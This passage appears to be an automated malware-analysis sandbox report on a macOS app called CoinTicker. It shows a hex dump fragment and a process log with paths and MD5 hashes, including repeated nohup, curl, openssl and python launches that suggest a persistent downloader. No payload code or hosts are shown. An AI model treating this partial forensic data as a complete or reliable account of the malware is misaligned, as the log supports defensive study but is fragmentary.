............4.t.0010: 8D 76 CC 86 0A A8 F0 4A 8A 42 D6 3F C8 A9 4D AD .v.....J.B.?..M.0020: 7C 08 AD E6 B6 50 B8 A2 1A 4D 88 07 B1 29 21 DC .....P...M...)!.0030: E7 DA C6 3C 21 E0 E3 11 49 70 AC 7A 1D 01 A4 CA ...<!...Ip.z....0040: 11 3A 57 AB 7D 57 2A 40 74 FD D3 1D 85 18 50 DF .:W..W*@t.....P.0050: 57 47 75 A1 7D 55 20 2E 47 37 50 72 8C 7F 82 1B WGu..U .G7Pr....0060: D2 62 8F 2D 03 5A DA C3 C8 A1 CE 2C 52 A2 00 63 .b.-.Z.....,R..c0070: EB 73 BA 71 C8 49 27 23 97 64 85 9E 38 0E AD 63 .s.q.I'#.d..8..c0080: 68 3C BA 52 81 58 79 A3 2C 0C DF DE 6D EB 31 F2 h<.R.Xy.,...m.1.0090: BA A0 7C 6C F1 2C D4 E1 BD 77 84 37 03 CE 32 B5 ...l.,...w.7..2.00A0: C8 9A 81 1A 4A 92 4E 3B 46 9A 85 FE 83 A2 F9 9E ....J.N;F.......00B0: 8C A3 CC 0D 5E B3 3D CF 04 78 8F 14 14 7B 32 9C ....^.=..x....2.00C0: C7 00 A6 5C C4 B5 A1 55 8D 5A 56 68 A4 22 70 AA ...\...U.ZVh."p.00D0: 3C 81 71 D9 9D A8 45 3B F4 E5 F6 A2 51 DD C7 7B <.q...E;....Q...00E0: 62 E8 6F 0C 74 EB B8 DA F8 BF 87 0D 79 50 91 90 b.o.t.......yP..00F0: 9B 18 3B 91 59 27 F1 35 28 13 AB 26 7E D5 F7 7A ..;.Y'.5(..&...z]

    System Behavior

    General

    Start time:10:58:28
    Start date:02/11/2018
    Path:/usr/libexec/xpcproxy
    File size:43488 bytes
    MD5 hash:d1bb9a4899f0af921e8188218b20d744

    General

    Start time:10:58:28
    Start date:02/11/2018
    Path:/Users/henry/Desktop/unpack/CoinTicker.app/Contents/MacOS/CoinTicker
    File size:488672 bytes
    MD5 hash:011fb781b08793ed1be8b1e9723c7ef2

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/usr/bin/base64
    File size:23248 bytes
    MD5 hash:718fe34e4012999c180f807fe323e7f1

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:58:29
    Start date:02/11/2018
    Path:/Library/Frameworks/Python.framework/Versions/2.7/bin/python
    File size:25624 bytes
    MD5 hash:8ec51a235078596c4b2e09b4db76e73b

    General

    Start time:10:58:30
    Start date:02/11/2018
    Path:/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    File size:24960 bytes
    MD5 hash:4d6dea37ae8536c5e20573905de9cf17

    General

    Start time:10:58:31
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:58:31
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:58:31
    Start date:02/11/2018
    Path:/sbin/ifconfig
    File size:71872 bytes
    MD5 hash:f81633f11f5fc0db70078b5ed1fedcec

    General

    Start time:10:59:46
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:46
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:46
    Start date:02/11/2018
    Path:/bin/sleep
    File size:18080 bytes
    MD5 hash:cd4336ba78cb5b78f50d0f935036c332

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/launchctl
    File size:124656 bytes
    MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/launchctl
    File size:124656 bytes
    MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

    General

    Start time:10:59:57
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:57
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:57
    Start date:02/11/2018
    Path:/bin/launchctl
    File size:124656 bytes
    MD5 hash:17fad4b994d600d0a5b6bc02b55c2c80

    General

    Start time:10:59:57
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:57
    Start date:02/11/2018
    Path:/usr/bin/grep
    File size:33936 bytes
    MD5 hash:2b3efb273296881708ea2914c612e0eb

    General

    Start time:11:00:02
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:11:00:02
    Start date:02/11/2018
    Path:/usr/bin/sw_vers
    File size:18848 bytes
    MD5 hash:d33f7f9efd4158694d0d58879b54f89d

    General

    Start time:11:00:02
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:11:00:03
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:11:00:03
    Start date:02/11/2018
    Path:/bin/bash
    File size:618448 bytes
    MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/usr/libexec/xpcproxy
    File size:43488 bytes
    MD5 hash:d1bb9a4899f0af921e8188218b20d744

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/usr/bin/sh
    File size:-1 bytes
    MD5 hash:

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/usr/bin/nohup
    File size:18624 bytes
    MD5 hash:522dd81fe30aa08bbb8c92fff8254c34

    General

    Start time:10:59:47
    Start date:02/11/2018
    Path:/usr/bin/curl
    File size:185104 bytes
    MD5 hash:078cd73f58d3d8f875eed22522ff73f7

    General

    Start time:10:59:50
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:59:50
    Start date:02/11/2018
    Path:/usr/bin/openssl
    File size:1234208 bytes
    MD5 hash:701bcd74cc70ef798fe42ec4e002dac6

    General

    Start time:10:59:50
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:10:59:50
    Start date:02/11/2018
    Path:/usr/bin/python
    File size:66880 bytes
    MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

    General

    Start time:10:59:50
    Start date:02/11/2018
    Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    File size:51744 bytes
    MD5 hash:ba780ab677147d9db60c564ef3f51dd0

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/usr/libexec/xpcproxy
    File size:43488 bytes
    MD5 hash:d1bb9a4899f0af921e8188218b20d744

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/usr/bin/sh
    File size:-1 bytes
    MD5 hash:

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/usr/bin/nohup
    File size:18624 bytes
    MD5 hash:522dd81fe30aa08bbb8c92fff8254c34

    General

    Start time:11:01:21
    Start date:02/11/2018
    Path:/usr/bin/curl
    File size:185104 bytes
    MD5 hash:078cd73f58d3d8f875eed22522ff73f7

    General

    Start time:11:01:22
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:01:22
    Start date:02/11/2018
    Path:/usr/bin/openssl
    File size:1234208 bytes
    MD5 hash:701bcd74cc70ef798fe42ec4e002dac6

    General

    Start time:11:01:22
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:01:22
    Start date:02/11/2018
    Path:/usr/bin/python
    File size:66880 bytes
    MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

    General

    Start time:11:01:22
    Start date:02/11/2018
    Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    File size:51744 bytes
    MD5 hash:ba780ab677147d9db60c564ef3f51dd0

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/usr/libexec/xpcproxy
    File size:43488 bytes
    MD5 hash:d1bb9a4899f0af921e8188218b20d744

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/usr/bin/sh
    File size:-1 bytes
    MD5 hash:

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/usr/bin/nohup
    File size:18624 bytes
    MD5 hash:522dd81fe30aa08bbb8c92fff8254c34

    General

    Start time:11:02:52
    Start date:02/11/2018
    Path:/usr/bin/curl
    File size:185104 bytes
    MD5 hash:078cd73f58d3d8f875eed22522ff73f7

    General

    Start time:11:02:53
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:02:53
    Start date:02/11/2018
    Path:/usr/bin/openssl
    File size:1234208 bytes
    MD5 hash:701bcd74cc70ef798fe42ec4e002dac6

    General

    Start time:11:02:53
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:02:53
    Start date:02/11/2018
    Path:/usr/bin/python
    File size:66880 bytes
    MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

    General

    Start time:11:02:53
    Start date:02/11/2018
    Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    File size:51744 bytes
    MD5 hash:ba780ab677147d9db60c564ef3f51dd0

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/usr/libexec/xpcproxy
    File size:43488 bytes
    MD5 hash:d1bb9a4899f0af921e8188218b20d744

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/usr/bin/sh
    File size:-1 bytes
    MD5 hash:

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/usr/bin/nohup
    File size:18624 bytes
    MD5 hash:522dd81fe30aa08bbb8c92fff8254c34

    General

    Start time:11:04:23
    Start date:02/11/2018
    Path:/usr/bin/curl
    File size:185104 bytes
    MD5 hash:078cd73f58d3d8f875eed22522ff73f7

    General

    Start time:11:04:24
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:04:24
    Start date:02/11/2018
    Path:/usr/bin/openssl
    File size:1234208 bytes
    MD5 hash:701bcd74cc70ef798fe42ec4e002dac6

    General

    Start time:11:04:24
    Start date:02/11/2018
    Path:/bin/sh
    File size:618512 bytes
    MD5 hash:8aa60b22a5d30418a002b340989384dc

    General

    Start time:11:04:24
    Start date:02/11/2018
    Path:/usr/bin/python
    File size:66880 bytes
    MD5 hash:2464fd41f7cf319d0e5c61a7643af77e

    General

    Start time:11:04:24
    Start date:02/11/2018
    Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
    File size:51744 bytes
    MD5 hash:ba780ab677147d9db60c564ef3f51dd0